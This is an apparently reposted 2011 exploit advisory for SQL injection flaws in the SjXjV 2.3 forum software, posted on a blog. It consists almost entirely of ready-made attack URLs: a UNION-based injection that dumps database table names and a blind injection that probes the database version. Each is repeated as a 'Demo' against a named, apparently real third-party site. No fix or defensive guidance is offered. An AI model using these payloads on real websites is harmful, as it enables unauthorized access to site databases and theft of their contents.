Saturday, October 29, 2011

SjXjV 2.3 SQL Injection

# [+] SjXjV-2.3 (post tid) Remote SQL Injection Vulnerabilities
# [+] Software : SjXjV-2.3
# [+] Download : http://www.shijiexuexi.cn
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#  [+] SQL
#
#    - http://site.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--
#
#      [+] Demo
#
#        - http://zeed.tk/bbs/wap/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--
#
#  [+] Blind SQL
#
#    - http://site.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5
#
#      [+] Demo
#        
#        - http://zeed.tk/bbs/wap/post.php?fid=41&tid=51 and substring(@@version,1,1)=5
#
#[------------------------------------------------------------------------------------]
#

0 comments:

Post a Comment